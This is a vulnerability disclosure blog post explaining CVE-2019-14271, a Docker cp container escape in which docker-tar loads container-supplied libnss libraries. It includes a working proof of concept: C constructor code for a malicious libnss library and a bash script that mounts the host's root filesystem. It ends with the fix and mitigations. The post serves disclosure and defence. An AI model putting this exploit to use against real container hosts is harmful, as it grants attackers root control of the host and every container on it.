This post is also available in: 日本語 (Japanese)

Executive Summary

In the last few years, several vulnerabilities in the copy (cp) command were found in various container platforms, including Docker, Podman and Kubernetes. The most severe among those was only recently discovered and disclosed in July. Surprisingly, it gained almost no immediate attention, perhaps due to an ambiguous CVE description and a lack of a published exploit.

CVE-2019-14271 marks a security issue in the implementation of the Docker cp command that can lead to full container escape when exploited by an attacker. This is the first complete container breakout since the severe runC vulnerability discovered back in February.

The vulnerability can be exploited, provided that a container has been compromised by a previous attack (e.g. through any other vulnerability, leaked secrets, etc.), or when a user runs a malicious container image from an untrusted source (registry or other). If the user then executes the vulnerable cp command to copy files out of the compromised container, the attacker can escape and take full root control of the host and all other containers in it.

CVE-2019-14271 was marked as critical and fixed in Docker version 19.03.1. The following research is an overview of CVE-2019-14271 and the first Proof of Concept (PoC) of the vulnerability.

Ariel Zelivansky and I have been closely following the recent surge of copy vulnerabilities in major container platforms, and we’ll present our findings at KubeCon + CloudNativeCon 2019 in San Diego on November 20. We’ll dive into past vulnerabilities, the different implementations and some of the underlying reasons that make this relatively simple command surprisingly hard to implement. We’ll also discuss some cool new kernel features specifically written to tackle this problem. If you’re interested in container security, please come and check it out!

Docker cp

The copy command allows copying files from and to containers, as well as between containers. The syntax is quite similar to the standard Unix cp command. To copy out /var/logs from a container, the syntax is docker cp container_name:/var/logs /some/host/path.

As you can see in the image below, to copy files out of the container, Docker uses a helper process called docker-tar.

Figure 1. Copying files out of a container

docker-tar works by chrooting into the container (as you can see in the next image), archiving the requested files and directories in it and then passing back the resulting tar file to the Docker daemon which is responsible for extracting it to the target directory on the host.

Figure 2. docker-tar chroots into the container

Chrooting is mostly done to avoid symlinks issues, which can occur when a host process tries to access files on a container. If one of those files is a symlink, it might inadvertently be resolved under the host root. This opens the door for attacker-controlled containers to try and trick docker cp into reading and writing files on the host instead of the container. Several CVEs in Docker and Podman were assigned for symlink related issues in the last year. By chrooting into the container’s root, docker-tar ensures all symlinks will be effectively resolved under it.

Unfortunately, chrooting into the container opened the way for an even more severe issue when copying files from a container.

CVE-2019-14271

Docker is written in Golang. Specifically, the vulnerable Docker version was compiled with Go v1.11. In this version, some packages that contained embedded C code (cgo) would dynamically load shared libraries at runtime. These packages include net and os/user, both used by docker-tar, which load several libnss_*.so libraries at runtime. Normally, libraries would be loaded from the host file system, but since docker-tar chroots to the container, it loads the libraries from the container file system. That means docker-tar will load and execute code originating and controlled by the container.

To clarify, aside from being chrooted to the container filesystem, docker-tar isn’t containerized. It runs in the host namespaces, with all root capabilities and not limited by cgroups or seccomp. Therefore, by injecting code into docker-tar, a malicious container gains full root access to the host.

The possible attack scenario is a Docker user that copies some files from either:

A container running a malicious image with bad libnss_*.so libraries.

libraries. A compromised container where an attacker replaced the libnss_*.so libraries.

In both cases, the attacker gains root code execution on the host.

Fun fact: This vulnerability was actually discovered from a GitHub issue. A user tried to copy files out of a debian:buster-slim container and complained docker cp repeatedly failed. The problem was that this specific image doesn’t contain the libnss libraries. Thus, when the user ran docker cp and the docker-tar process tried to load them from the container filesystem, it failed and crashed.

Exploitation

To exploit CVE-2019-14271, we need to build a malicious libnss library. I arbitrarily chose libnss_files.so. I downloaded the library’s source and added one function, run_at_link(), to one of the source files. I also defined the function with the constructor attribute. The constructor attribute (a GCC-specific syntax) indicates that the run_at_link function is to be executed as an initialization function for our library when it is loaded by a process. This means that when the docker-tar process will dynamically load our malicious library, run_at_link will be executed. Below is the run_at_link code, shortened for brevity.

#include ... #define ORIGINAL_LIBNSS "/original_libnss_files.so.2" #define LIBNSS_PATH "/lib/x86_64-linux-gnu/libnss_files.so.2" bool is_priviliged(); __attribute__ ((constructor)) void run_at_link(void) { char * argv_break[2]; if (!is_priviliged()) return; rename(ORIGINAL_LIBNSS, LIBNSS_PATH); fprintf(log_fp, "switched back to the original libnss_file.so"); if (!fork()) { // Child runs breakout argv_break[0] = strdup("/breakout"); argv_break[1] = NULL; execve("/breakout", argv_break, NULL); } else wait(NULL); // Wait for child return; } bool is_priviliged() { FILE * proc_file = fopen("/proc/self/exe", "r"); if (proc_file != NULL) { fclose(proc_file); return false; // can open so /proc exists, not privileged } return true; // we're running in the context of docker-tar } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 #include ... #define ORIGINAL_LIBNSS "/original_libnss_files.so.2" #define LIBNSS_PATH "/lib/x86_64-linux-gnu/libnss_files.so.2" bool is_priviliged ( ) ; __attribute__ ( ( constructor ) ) void run_at_link ( void ) { char * argv_break [ 2 ] ; if ( ! is_priviliged ( ) ) return ; rename ( ORIGINAL_LIBNSS , LIBNSS_PATH ) ; fprintf ( log_fp , "switched back to the original libnss_file.so" ) ; if ( ! fork ( ) ) { // Child runs breakout argv_break [ 0 ] = strdup ( "/breakout" ) ; argv_break [ 1 ] = NULL ; execve ( "/breakout" , argv_break , NULL ) ; } else wait ( NULL ) ; // Wait for child return ; } bool is_priviliged ( ) { FILE * proc_file = fopen ( "/proc/self/exe" , "r" ) ; if ( proc_file != NULL ) { fclose ( proc_file ) ; return false ; // can open so /proc exists, not privileged } return true ; // we're running in the context of docker-tar }

run_at_link first verifies it runs in the context of docker-tar, since other, normal container processes might also load it. This is done by checking the /proc directory. If run_at_link runs in the context of docker-tar, this directory will be empty, since the procfs mount on /proc only exists in the container mount namespace.

Next, run_at_link replaces the evil libnss library with the original one. This ensures that any subsequent processes run by the exploit won’t accidentally load the malicious version and retrigger the execution of run_at_link.

Then, to simplify the exploit, run_at_link attempts to run an executable file at path /breakout in the container. This allows the rest of the exploit to be written in bash for example, instead of C. Leaving the rest of the logic out of run_at_link also means we don’t have to recompile the evil library for every change in the exploit, but rather just change the breakout binary.

In the exploit video below, a Docker user runs a malicious image that contains our evil libnss_files.so library and then tries to copy some logs from the container. The /breakout binary in the image is a simple bash script that mounts the host filesystem to the container at /host_fs and also writes a message to /evil on the host.

Video 1. Exploiting CVE-2019-14271 to break out of Docker

Below is the source for the /breakout script used in the video. To get a reference to the host root filesystem, the script mounts procfs over /proc. Since docker-tar runs in the PID namespace of the host, the mounted procfs will contain data on host processes. The script then simply mounts the root of the host’s PID 1.

#!/bin/bash umount /host_fs && rm -rf /host_fs mkdir /host_fs mount -t proc none /proc # mount the host's procfs over /proc cd /proc/1/root # chdir to host's root mount --bind . /host_fs # mount host root at /host_fs echo "Hello from within the container!" > /host_fs/evil 1 2 3 4 5 6 7 8 9 10 #!/bin/bash umount / host_fs && rm - rf / host_fs mkdir / host_fs mount - t proc none / proc # mount the host's procfs over /proc cd / proc / 1 / root # chdir to host's root mount -- bind . / host_fs # mount host root at /host_fs echo "Hello from within the container!" > / host_fs / evil

The Fix

The fix included patching the init function of docker-tar to call arbitrary functions from the problematic Go packages. This forced docker-tar to load the libnss libraries before chrooting to the container, and thus from the host filesystem.

Figure 3. CVE-2019-14271 fix

Conclusion

A vulnerability allowing root code execution on the host is highly dangerous. Make sure you’re running Docker version 19.03.1 or newer versions, which include the fix to this security issue. To restrict the attack surface for this kind of attacks, I strongly suggest to never run untrusted images.

Furthermore, when root is not strictly needed, I highly recommend running containers as a non-root user. This further increases their security and prevents attackers from exploiting many of the flaws that may be found in container engines or the kernel. In the case of CVE-2019-14271, if your container is run with a non-root user, you are protected. Even if an attacker compromised your container, he cannot overwrite the container’s libnss libraries as they are owned by root, and therefore cannot exploit the vulnerability. If you’re still not convinced, this post by Ariel Zelivansky covers the security advantages of running non-root containers and might change your mind.

Palo Alto Networks customers running Prisma Cloud are further protected from this threat through the following set of capabilities: